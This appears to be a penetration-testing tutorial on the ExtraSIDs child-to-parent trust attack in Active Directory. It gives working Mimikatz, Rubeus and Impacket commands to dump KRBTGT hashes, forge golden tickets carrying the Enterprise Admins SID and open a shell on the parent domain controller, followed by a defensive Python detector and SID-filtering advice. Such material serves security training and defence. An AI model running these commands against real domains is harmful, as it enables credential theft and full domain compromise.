Child -> Parent Trusts
ExtraSids Attack
An ExtraSIDs attack is a post-exploitation technique in which an attacker forges a Kerberos ticket for a compromised account and injects additional Security Identifiers (SIDs) into it (the ExtraSids field of the ticket's PAC, the same field that carries SIDHistory), so that the access token Windows builds from the ticket grants privileges the account was never given, such as Domain Admin access. This is usually done with Mimikatz or similar tools. It exploits the fact that Windows trusts the SIDs presented in the ticket when evaluating token privileges, allowing lateral movement and privilege escalation in Active Directory environments.
Using this, we can compromise the parent domain once the child domain has been compromised.
To execute this attack after compromising a child domain, the following information is required:
- The KRBTGT hash of the child domain
- The SID of the child domain
- The name of a target user in the child domain (this user does not need to exist)
- The Fully Qualified Domain Name (FQDN) of the child domain
- The SID of the Enterprise Admins group in the root domain
Windows
Gathering Information
- KRBTGT hash
- SID
Since we already have access to the child domain with Domain Admin privileges, we can use Mimikatz to perform a DCSync attack and retrieve the KRBTGT hash.
mimikatz> lsadump::dcsync /user:DOMAIN\krbtgt
## DOMAIN is the NetBIOS name of the child domain (USA in this example)
## PowerView
## SID of Domain (Child Domain in our case)
Get-DomainSID
## SID of Group (Enterprise Admins group of root domain in our case)
Get-DomainGroup -Domain REZYDEV.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid
Get-ADGroup -Identity "Enterprise Admins" -Server "REZYDEV.LOCAL" ## LOTL: same lookup with the built-in ActiveDirectory module, no PowerView needed
Creating a Golden Ticket
- mimikatz
- Rubeus
mimikatz.exe
mimikatz> kerberos::golden /user:phpheker /domain:USA.REZYDEV.LOCAL /sid:<SID-OF-CHILD-DOMAIN> /krbtgt:<NTLM-HASH-KRBTGT-USER> /sids:<SID-OF-ENTERPRISE-ADMIN-ROOT-DOMAIN> /ptt
klist # Check if Kerberos ticket for the non-existent 'phpheker' user is in memory
.\Rubeus.exe golden /rc4:<NTLM-HASH-KRBTGT-USER> /domain:USA.REZYDEV.LOCAL /sid:<SID-OF-CHILD-DOMAIN> /sids:<SID-OF-ENTERPRISE-ADMIN-ROOT-DOMAIN> /user:phpheker /ptt
klist # Check if Kerberos ticket for the non-existent 'phpheker' user is in memory
Once a Golden Ticket carrying the parent domain's Enterprise Admins SID has been created and injected in the child domain, we can perform a DCSync attack against the parent domain using any available method.
DCSync with Mimikatz
.\mimikatz.exe
lsadump::dcsync /user:REZYDEV\jethalal_adm
## Use /domain:REZYDEV.LOCAL to specify the domain of the target principal
Linux
Gathering Information
- secretsdump.py
- SID
python3 /path/to/secretsdump.py usa.rezydev.local/jethalal_adm@10.10.10.50 -just-dc-user USA/krbtgt
We can use lookupsid.py from the Impacket toolkit to perform SID brute-forcing and find the SID of the child domain.
python3 /path/to/lookupsid.py usa.rezydev.local/jethalal_adm@10.10.10.50
This tool will output the Domain SID first, followed by the user RIDs. The user RID is in the format [RID] USERNAME.
To create the SID, we can simply combine DOMAIN_SID-USER_RID to form the SID of a user.
- For the child domain we only need the Domain SID itself, not a user SID.
- Run the same command again against rezydev.local and combine DOMAIN_SID-GROUP_RID to form the SID of the Enterprise Admins group of the root domain.
Creating a Golden Ticket
python3 /path/to/ticketer.py -nthash <NTLM-HASH-KRBTGT-USER> -domain USA.REZYDEV.LOCAL -domain-sid <SID-OF-CHILD-DOMAIN> -extra-sid <SID-OF-ENTERPRISE-ADMIN-ROOT-DOMAIN> phpheker
## Above command will create .ccache file to store the golden ticket.
## We need to set 'KRB5CCNAME' environment variable to be able to use it.
export KRB5CCNAME=phpheker.ccache
## Shell using Golden Ticket
python3 /path/to/psexec.py USA.REZYDEV.LOCAL/phpheker@dc01.rezydev.local -k -no-pass -target-ip 10.10.10.10
Automated Attack
Impacket has raiseChild.py, which automates the process of creating a golden ticket and compromising the parent domain through a compromised child domain.
python3 /path/to/raiseChild.py -target-exec 10.10.10.10 USA.REZYDEV.LOCAL/jethalal_adm
## Note: '-target-exec' makes raiseChild.py authenticate to the parent domain's DC and open a shell there via psexec
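From the defender's side, the two artefacts this page relies on are also the detection opportunities: the forged ticket carries a SID from a foreign domain with the well-known Enterprise Admins RID 519, and it is issued for an account (phpheker) that does not exist in the child domain. The following is an added example, not code from this page or from Impacket, that splits SIDs the way the DOMAIN_SID-RID composition above describes and flags both indicators over a constructed set of normalised ticket records; the domain SIDs, the account list and the record layout are all assumptions.

```python
import re
from typing import NamedTuple

# Constructed values: neither SID belongs to a real domain.
CHILD_DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # USA.REZYDEV.LOCAL
PARENT_DOMAIN_SID = "S-1-5-21-4444444444-5555555555-6666666666"  # REZYDEV.LOCAL
ENTERPRISE_ADMINS_RID = 519  # well-known RID; the group exists only in the forest root
# Constructed snapshot of accounts that really exist in the child domain.
KNOWN_CHILD_ACCOUNTS = {"jethalal_adm", "administrator", "krbtgt"}

SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

def split_sid(sid):
    """Return (domain SID, RID) for a domain SID, None for well-known SIDs like S-1-5-18."""
    m = SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else None

def build_sid(domain_sid, rid):
    """DOMAIN_SID-RID, the same composition applied to lookupsid.py output above."""
    return f"{domain_sid}-{rid}"

class Finding(NamedTuple):
    account: str
    reason: str

def analyse(records):
    """Flag ExtraSIDs indicators in normalised ticket records (assumed layout:
    account, issuing_domain_sid, and the list of SIDs the ticket presents)."""
    findings = []
    for rec in records:
        for sid in rec["sids"]:
            parts = split_sid(sid)
            # RID 519 from any domain other than the one that issued the ticket
            if parts and parts[0] != rec["issuing_domain_sid"] and parts[1] == ENTERPRISE_ADMINS_RID:
                findings.append(Finding(rec["account"], f"foreign Enterprise Admins SID {sid}"))
        # A ticket for an account the issuing domain does not know is a forged ticket
        if rec["account"].lower() not in KNOWN_CHILD_ACCOUNTS:
            findings.append(Finding(rec["account"], "account not found in child domain"))
    return findings

# Constructed records: a legitimate Domain Admin logon and the golden ticket from this page.
SAMPLE_RECORDS = [
    {"account": "jethalal_adm", "issuing_domain_sid": CHILD_DOMAIN_SID,
     "sids": [build_sid(CHILD_DOMAIN_SID, 512)]},
    {"account": "phpheker", "issuing_domain_sid": CHILD_DOMAIN_SID,
     "sids": [build_sid(CHILD_DOMAIN_SID, 512), build_sid(PARENT_DOMAIN_SID, 519)]},
]

if __name__ == "__main__":
    for finding in analyse(SAMPLE_RECORDS):
        print(finding)
```

Both indicators only fire on the forged ticket; enabling SID filtering on the trust removes the foreign-SID path entirely, which is the mitigation the attack depends on being absent.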